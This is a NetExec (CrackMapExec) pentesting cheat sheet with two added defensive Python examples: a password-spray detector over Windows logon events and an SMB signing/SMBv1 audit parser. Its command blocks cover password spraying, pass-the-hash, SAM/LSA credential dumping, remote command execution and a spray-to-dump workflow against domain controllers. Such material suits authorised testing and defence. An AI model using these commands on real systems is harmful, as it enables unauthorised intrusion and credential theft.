Description
CrackMapExec (now maintained as NetExec) is the Swiss army knife for Active Directory and Windows pentesting. It speaks the SMB, WinRM, LDAP, MSSQL, SSH, and RDP protocols and bundles credential spraying, enumeration, and post-exploitation capabilities behind one command-line interface.
Installation
```bash
# NetExec (successor to CrackMapExec)
pip install netexec
# Or
pipx install git+https://github.com/Pennyw0rth/NetExec
```
Basic Usage
```bash
# SMB enumeration
nxc smb <IP> -u user -p 'password'
nxc smb <IP/CIDR> -u '' -p '' --shares          # null session share listing
# Password spraying
nxc smb <IP/CIDR> -u users.txt -p 'Password1!'
nxc smb <IP/CIDR> -u users.txt -p passwords.txt --no-bruteforce   # line N of users.txt with line N of passwords.txt, not every combination
# WinRM
nxc winrm <IP> -u user -p 'password' -x 'whoami'
# LDAP
nxc ldap <DC_IP> -u user -p 'password' --users
```
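The spraying commands above leave a distinctive trace on the target: one failed network logon (Event ID 4625, logon type 3) per account, all from one source address, within seconds of each other. The following detector is an added example for the defending side; it is not part of NetExec or of this cheat sheet's original content. The event rows are constructed for the demo and mirror the fields a SIEM extracts from the Security log (TimeCreated, EventID, TargetUserName, IpAddress, LogonType); the thresholds `window` and `min_accounts` are assumed starting values to tune per environment.

```python
"""Flag password-spray patterns in Windows logon events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security-log entries: (TimeCreated, EventID, TargetUserName, IpAddress, LogonType).
# 4625 = failed logon, 4624 = successful logon; logon type 3 = network (SMB/WinRM/LDAP binds look like this).
SAMPLE_EVENTS = [
    ("2025-03-01T09:00:01", 4625, "alice", "10.0.0.50", 3),
    ("2025-03-01T09:00:01", 4625, "bob",   "10.0.0.50", 3),
    ("2025-03-01T09:00:02", 4625, "carol", "10.0.0.50", 3),
    ("2025-03-01T09:00:02", 4625, "dave",  "10.0.0.50", 3),
    ("2025-03-01T09:00:03", 4625, "erin",  "10.0.0.50", 3),
    ("2025-03-01T09:00:03", 4624, "frank", "10.0.0.50", 3),  # one guess succeeded
    ("2025-03-01T09:00:04", 4625, "grace", "10.0.0.50", 3),
    # A real user mistyping their password twice at the console (logon type 2): not a spray.
    ("2025-03-01T09:10:00", 4625, "heidi", "10.0.0.77", 2),
    ("2025-03-01T09:10:09", 4625, "heidi", "10.0.0.77", 2),
    ("2025-03-01T09:10:20", 4624, "heidi", "10.0.0.77", 2),
]


def parse_events(rows):
    """Turn raw tuples into dicts with a parsed timestamp and a normalised user name."""
    return [
        {"time": datetime.fromisoformat(t), "id": eid, "user": user.lower(), "src": ip, "ltype": ltype}
        for t, eid, user, ip, ltype in rows
    ]


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {source_ip: finding} for every source whose network-logon failures hit at
    least `min_accounts` distinct accounts inside some interval of length `window`.
    Each finding lists the sprayed accounts, when the burst started, and any account
    that later logged on successfully from the same source (the guess that landed)."""
    failures = defaultdict(list)
    successes = defaultdict(set)
    for e in events:
        if e["ltype"] != 3:          # only network logons matter for a remote spray
            continue
        if e["id"] == 4625:
            failures[e["src"]].append(e)
        elif e["id"] == 4624:
            successes[e["src"]].add(e["user"])

    findings = {}
    for src, evs in failures.items():
        evs.sort(key=lambda e: e["time"])
        for i, start in enumerate(evs):        # slide a window over each source's failures
            users = {e["user"] for e in evs[i:] if e["time"] - start["time"] <= window}
            if len(users) >= min_accounts:
                findings[src] = {
                    "accounts": sorted(users),
                    "first_seen": start["time"],
                    "succeeded": sorted(successes[src]),
                }
                break
    return findings


if __name__ == "__main__":
    for src, f in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"[spray] {src}: {len(f['accounts'])} accounts starting {f['first_seen']:%H:%M:%S}; "
              f"successful logons from the same source: {f['succeeded'] or 'none'}")
```

The distinct-account count is what separates a spray from a single user locking themselves out: the second source in the sample fails repeatedly but against one account, so it never trips the threshold. Reporting successes from the same source matters because `--continue-on-success` (used in the workflow section below) keeps the tool spraying after a hit, so the successful logon is buried in the middle of the failure burst rather than ending it.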
Advanced Usage
```bash
# Pass-the-Hash
nxc smb <IP> -u admin -H 'NTLM_HASH' --sam
# Dump SAM/LSA
nxc smb <IP> -u admin -p 'password' --sam
nxc smb <IP> -u admin -p 'password' --lsa
# Find relay targets (hosts that do not require SMB signing)
nxc smb <IP/CIDR> --gen-relay-list relay.txt
# Command execution
nxc smb <IP> -u admin -p 'password' -x 'whoami'
nxc smb <IP> -u admin -p 'password' -X 'Get-Process' # PowerShell
# RID brute force
nxc smb <IP> -u '' -p '' --rid-brute
# Bloodhound collection
nxc ldap <DC_IP> -u user -p 'password' --bloodhound -c All
```
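`--gen-relay-list` works because nxc already prints, for every SMB host it touches, a banner stating whether signing is required and whether SMBv1 is enabled. Read from the other side, that banner is a hardening inventory. The parser below is an added example (not NetExec code) that turns captured nxc output into a list of hosts needing remediation; it goes one step beyond the relay list by also flagging SMBv1. The sample lines are constructed and modelled on the banner format, and the regex assumes that format, so adjust it if your nxc version prints the fields differently.

```python
"""Audit SMB signing / SMBv1 from captured nxc smb output (added example)."""
import re

# Constructed sample modelled on the per-host banner nxc prints; hosts, IPs and domain are made up.
SAMPLE_OUTPUT = """\
SMB  10.10.1.5   445  DC01    [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.example) (signing:True) (SMBv1:False)
SMB  10.10.1.20  445  FS01    [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.example) (signing:False) (SMBv1:True)
SMB  10.10.1.31  445  WS-042  [*] Windows 10 Build 19041 x64 (name:WS-042) (domain:corp.example) (signing:False) (SMBv1:False)
SMB  10.10.1.40  445  PRINT1  [-] connection refused
"""

# Assumed banner layout: protocol, IP, port, hostname, "[*]", OS string, then the (key:value) fields.
BANNER = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+\[\*\].*?"
    r"\(signing:(?P<signing>True|False)\).*?\(SMBv1:(?P<smbv1>True|False)\)"
)


def audit_smb_hardening(text):
    """Return one finding per host that has at least one weak setting:
    signing not required (the condition --gen-relay-list selects on) or SMBv1 enabled.
    Lines that are not a successful banner (errors, module output) are skipped."""
    findings = []
    for line in text.splitlines():
        m = BANNER.search(line)
        if not m:
            continue
        issues = []
        if m["signing"] == "False":
            issues.append("SMB signing not required")
        if m["smbv1"] == "True":
            issues.append("SMBv1 enabled")
        if issues:
            findings.append({"ip": m["ip"], "host": m["host"], "issues": issues})
    return findings


if __name__ == "__main__":
    for f in audit_smb_hardening(SAMPLE_OUTPUT):
        print(f"{f['host']:<8} {f['ip']:<12} {'; '.join(f['issues'])}")
```

Feed it the saved output of a run such as `nxc smb <IP/CIDR> > smb_hosts.txt` and the result is the list of machines where `RequireSecuritySignature` still needs to be enforced by policy; a host that appears in `relay.txt` will always appear here too, while the SMBv1 column catches systems the relay list alone would not.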
Common Workflows
```bash
# AD spray + enumerate + exploit
nxc smb <DC_IP> -u users.txt -p 'Spring2025!' --continue-on-success   # keep going after the first valid credential
nxc smb <DC_IP> -u valid_user -p 'Spring2025!' --shares
nxc smb <DC_IP> -u valid_user -p 'Spring2025!' --sam
```